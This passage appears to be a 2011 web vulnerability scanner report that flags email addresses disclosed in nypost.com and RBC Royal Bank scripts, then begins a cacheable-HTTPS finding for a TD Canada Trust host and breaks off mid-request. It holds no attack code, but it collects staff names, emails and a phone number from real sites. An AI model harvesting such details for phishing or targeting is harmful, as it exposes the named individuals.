Cookie: is_returning=1; __qca=P0-52444882-1317129796944; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.4.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=4; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 27 Sep 2011 13:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 27 Sep 2011 13:24:41 GMT
Content-Length: 56332
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<a href="mailto:esmith@nypost.com">
...[SNIP]...
<a href="mailto:imohr@nypost.com">Ian Mohr</a>, <a href="mailto:ssmith@nypost.com">
...[SNIP]...
<a href="mailto:tpalmeri@nypost.com">
...[SNIP]...

10.23. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 22 Jan 2010 21:59:14 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7987
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/***** events ******/

.events_default h2.block_title, .events_default h3{
   margin-left:10px;
}
.events_default h2.block_title a{
   font-size:14px;
   color:#c00;
}
events_default h2.bloc
...[SNIP]...

10.24. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 05 Sep 2009 18:10:10 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5443
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/***** events home ******/
#events{
   margin-left:5px;
}
.rounded_lt_home_3d,
.rounded_lt_3d .rounded_head,
.rounded_lt_3d .rounded_foot{
   width:160px;
   background-image:url(/rw/SysConf
...[SNIP]...
nts_default .section_block_detail_list li{
   margin-bottom:10px;
   margin-top:3px;
   margin-left:5px;
}
ul.event_list li p{
   margin:0; padding:0;
}@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/***** events home ******/
#events{
   margin-left:5px;
}
.rounded_lt_home_3d,
.rounded_lt_3d .rounded_head,
.rounded_lt_3d .rounded_foot{
   width:160px;
   background-image:url(/rw/SysConf
...[SNIP]...

10.25. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Feb 2010 16:28:16 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 8547
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

.local_page{}

#ct_rail{
   padding-bottom: 20px;
}

.inner_lt{
   width:190px;
   /*height: 2000px;*/
   float:left;
}

.inner_rt{
   width:440px;
   /*height: 2000px;*/
   float:left;
   m
...[SNIP]...

10.26. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/lotto/lotto.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/lotto/lotto.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/lotto/lotto.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Aug 2009 20:26:56 GMT
Content-Type: text/javascript
Content-Length: 384
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:22:52 GMT
Connection: close

// JavaScript Document
//@Author: tmoussignac@nypost.com

$(document).ready(function() {
   /***************! important ****************/                    
   //tabs
   function initTabs(object, rotation){$(object).tabs({ cache: true }).tabs('rotate', rotation);}    
   /******
...[SNIP]...

10.27. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/transit/transit.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/transit/transit.css

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/transit/transit.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 28 Aug 2009 21:30:14 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 265
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:22:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

#transit{
   text-align:right;
}
#transit img{
   margin:0 5px 5px 0;
}
#transit h2{
   font:22px 'arial black';
   color:#c00;
   line-height:22px;
   text-align:center;
   padding:5px;
}

10.28. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 22 Mar 2011 17:47:09 GMT
Content-Type: text/javascript
Content-Length: 603
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close


// JavaScript Document
/* Author: tmoussignac@nypost.com */

$(document).ready(function(){

   $('.thumb_view').addClass('thumb_view_select');
   
   $('.list_view').click(function(){
       $('.widget_thumbs').hide();                            
       $('.widget_list').fadeIn('fast'
...[SNIP]...

10.29. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 25 Aug 2009 10:26:48 GMT
Content-Type: text/javascript
Content-Length: 222
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

/*
Author:tmoussignac@nypost.com
Document: Javascript
Version: 1.0
*/

function createCal(obj){
   $(obj).addClass('calendar').datepicker();
}

$(document).ready(function() {
   createCal('#event_text_input');
})

10.30. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 12 Aug 2009 14:55:59 GMT
Content-Type: text/javascript
Content-Length: 863
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

// JavaScript Document
//@Author: tmoussignac@nypost.com

$(document).ready(function(){
                       
   //*************! important *******************/

   $('ul.poll_mini li').each(function(i){
           $(this).find(".poll_graph").animate({"width" : $(this).find
...[SNIP]...

10.31. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten.css

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 12 Aug 2009 14:55:54 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2920
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/*post ten*/
#post_ten{
margin:0 auto;
clear:both;
display:block;
}
.post_ten_block{
   position:static;
   margin-bottom:-5px;
}
#post_ten_foot{
width:968px;
height:15px;
background:url(/
...[SNIP]...

10.32. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 12 Aug 2009 14:55:50 GMT
Content-Type: text/javascript
Content-Length: 1229
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

// JavaScript Document
/* Author: tmoussignac@nypost.com */

$(document).ready(function(){
   /***************! important ****************/                    
   //tabs
   function initTabs(object, rotation){$(object).tabs({ cache: true }).tabs('rotate', rotation);}    

...[SNIP]...

10.33. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_tables/section_tables.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_tables/section_tables.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_tables/section_tables.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 12 Aug 2009 14:55:48 GMT
Content-Type: text/javascript
Content-Length: 225
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:22:52 GMT
Connection: close

// JavaScript Document
/* Author: tmoussignac@nypost.com */
$(document).ready(function(){
   $(".section_tables tr:even").css("background-color", "#eee");
   $(".section_tables tr:odd").css("background-color", "#fff");
});

10.34. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 07 Jun 2010 18:25:34 GMT
Content-Type: text/javascript
Content-Length: 428
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

// JavaScript Document
//@Author: tmoussignac@nypost.com

$(document).ready(function() {
   /***************! important ****************/                    
   //tabs
   function initTabs(object, rotation){$(object).tabs({ cache: true }).tabs('rotate', rotation);}    
   /******
...[SNIP]...

10.35. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 11 Sep 2009 13:56:40 GMT
Content-Type: text/javascript
Content-Length: 7059
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

// JavaScript Document
//@Author:tmoussignac@nypost.com

$(document).ready(function(){
   
   
   //*****************! important ********************//
       
   //function use to enable object
   $('#bottom_controls').fadeIn('fast');
   function setObj(object){
       $(objec
...[SNIP]...

10.36. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/scripts/block_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 16 Nov 2010 16:00:46 GMT
Content-Type: text/javascript
Content-Length: 3982
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

//@Author: tmoussignac@nypost.com
function href(url){window.location.href=url}function story_tab_href(tab,urls){var from=document.referrer;var key='';var found=false;var name='';for(key in urls.links){if(urls.links[key].url==from){fo
...[SNIP]...

10.37. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 26 Mar 2010 18:49:46 GMT
Content-Type: text/javascript
Content-Length: 9403
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

10.38. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 04 Sep 2009 23:01:28 GMT
Content-Type: text/javascript
Content-Length: 2239
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:52 GMT
Connection: close

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

10.39. http://www.rbcroyalbank.com/uos/_assets/js/utilities.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rbcroyalbank.com
Path:   /uos/_assets/js/utilities.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /uos/_assets/js/utilities.js HTTP/1.1
Host: www.rbcroyalbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.rbcroyalbank.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:27:20 GMT
Last-Modified: Tue, 15 Sep 2009 15:51:17 GMT
ETag: "4739fc0b62740"
Accept-Ranges: bytes
Content-Length: 27165
Cache-Control: max-age=0
Expires: Tue, 27 Sep 2011 13:27:20 GMT
Content-Type: application/x-javascript

/* UOS Version: 2.2 - May 4, 2009 */

/***********************************************************************/
/* Popups
/***********************************************************************/

fun
...[SNIP]...
******************************************/
/* Disclaimer page redirect
/***********************************************************************/
// Automagic disclaimer page (c) 2004 Daniel Saraga
// daniel.saraga@rbc.com 416-974-8143
// modified by Emad Jad Dec. 22, 2005 emad.jad@rbc.com
// This section separates the disclaimer URL from the destination URL

function getParams() {
var idx = document.URL.indexOf('?');
var params = new Array();
if (idx != -1) {
var pa
...[SNIP]...

11. Cacheable HTTPS response  previous  next
There are 13 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


11.1. https://easywebsoc.tdcanadatrust.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://easywebsoc.tdcanadatrust.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: easywebsoc.tdcanadatrust.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
